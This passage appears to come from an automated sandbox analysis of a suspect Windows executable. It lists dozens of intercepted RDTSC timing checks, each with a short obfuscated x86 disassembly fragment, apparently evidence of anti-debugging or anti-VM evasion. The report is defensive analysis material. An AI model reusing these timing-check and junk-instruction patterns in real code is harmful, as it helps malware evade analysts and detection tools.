                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05797 second address: A057E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE31h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007F7F1511CE32h 0x00000012 jmp 00007F7F1511CE2Ch 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F7F1511CE26h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F7F1511CE31h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A057E1 second address: A057F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A057F3 second address: A057F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1F2D second address: 9D1F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06620 second address: A06635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06A8B second address: A06AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06AA0 second address: A06AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06AB2 second address: A06ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06ABF second address: A06AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B027 second address: A0B044 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F147AEA51h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B333 second address: A0B350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F1511CE2Dh 0x0000000b jo 00007F7F1511CE26h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B350 second address: A0B356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B356 second address: A0B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F7F1511CE2Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE32h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B380 second address: A0B399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7F147AEA4Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B399 second address: A0B3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B3A4 second address: A0B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F7F147AEA46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B63C second address: A0B648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B648 second address: A0B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA51h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jng 00007F7F147AEA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007F7F147AEA46h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B821 second address: A0B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c jmp 00007F7F1511CE38h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BB56 second address: A0BBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F147AEA4Eh 0x00000008 jns 00007F7F147AEA46h 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007F7F147AEA7Dh 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f jne 00007F7F147AEA46h 0x00000025 pop edi 0x00000026 pushad 0x00000027 jmp 00007F7F147AEA55h 0x0000002c jmp 00007F7F147AEA4Eh 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0C0FF second address: A0C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0C5F6 second address: A0C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F147AEA46h 0x0000000a jl 00007F7F147AEA46h 0x00000010 popad 0x00000011 jmp 00007F7F147AEA58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F147AEA58h 0x0000001e jo 00007F7F147AEA4Eh 0x00000024 jno 00007F7F147AEA46h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0C648 second address: A0C65F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE31h 0x00000008 jmp 00007F7F1511CE2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6696 second address: 9D669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D669A second address: 9D66A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6728 second address: 9D6735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6735 second address: 9D6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jg 00007F7F1511CE26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6750 second address: 9D6757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6757 second address: 9D6765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE2Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6765 second address: 9D67C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 jmp 00007F7F147AEA57h 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov cx, di 0x00000021 call 00007F7F147AEA49h 0x00000026 push ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f jmp 00007F7F147AEA4Fh 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D67C2 second address: 9D67C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6908 second address: 9D690E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D690E second address: 9D6922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6922 second address: 9D6926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6A6F second address: 9D6A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6CA2 second address: 9D6CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D718F second address: 9D7199 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7398 second address: 9D73DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and ecx, 17A4E6AFh 0x00000012 lea eax, dword ptr [ebp+12487E1Dh] 0x00000018 nop 0x00000019 pushad 0x0000001a push esi 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7F147AEA57h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D73DD second address: 9D740C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jnc 00007F7F1511CE28h 0x00000013 pop esi 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D1A1Dh] 0x0000001b lea eax, dword ptr [ebp+12487DD9h] 0x00000021 add dword ptr [ebp+124770CDh], ebx 0x00000027 nop 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D740C second address: 9B7CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F7F147AEA59h 0x00000012 push ebx 0x00000013 jmp 00007F7F147AEA59h 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F7F147AEA48h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 call dword ptr [ebp+122D2B4Eh] 0x0000003b jng 00007F7F147AEA7Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F7F147AEA58h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7CC5 second address: 9B7CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CCF second address: A10CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA52h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CF1 second address: A10CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CF7 second address: A10D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007F7F147AEA48h 0x0000000d pushad 0x0000000e jmp 00007F7F147AEA56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10D1F second address: A10D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10D25 second address: A10D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F7F147AEA4Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13E96 second address: A13EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7F1511CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16227 second address: A1623D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7F147AEA4Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DB4 second address: A15DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DBF second address: A15DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18A42 second address: A18A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18A48 second address: A18A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA4Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18C5B second address: A18C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18F04 second address: A18F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA59h 0x00000009 popad 0x0000000a jns 00007F7F147AEA48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18F2D second address: A18F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F1511CE26h 0x0000000a jmp 00007F7F1511CE34h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7F1511CE26h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D5CA second address: A1D601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Dh 0x00000007 jnp 00007F7F147AEA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA52h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D601 second address: A1D60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D60D second address: A1D611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DA38 second address: A1DA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DBAA second address: A1DBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 jmp 00007F7F147AEA4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA55h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DBE8 second address: A1DBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F1511CE26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A230AD second address: A230EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA56h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F7F147AEA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23258 second address: A2327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE37h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F7F1511CE26h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2327D second address: A232B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7F147AEA57h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232B6 second address: A232BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232BE second address: A232C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232C7 second address: A232CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A236FB second address: A23704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23704 second address: A23708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6F2B second address: 9D6F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24653 second address: A24657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2784A second address: A2784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F764 second address: 98F78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7F1511CE39h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27269 second address: A27273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27273 second address: A27288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7F1511CE28h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E9BD second address: A2E9C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAA8 second address: A2CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAB2 second address: A2CAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAB8 second address: A2CAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CC4A second address: A2CC4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D360 second address: A2D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D364 second address: A2D39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7F147AEA4Ch 0x0000000e jno 00007F7F147AEA46h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007F7F147AEA4Ah 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7F147AEA4Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D5F0 second address: A2D5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D5F6 second address: A2D600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D856 second address: A2D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E11A second address: A2E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E120 second address: A2E134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
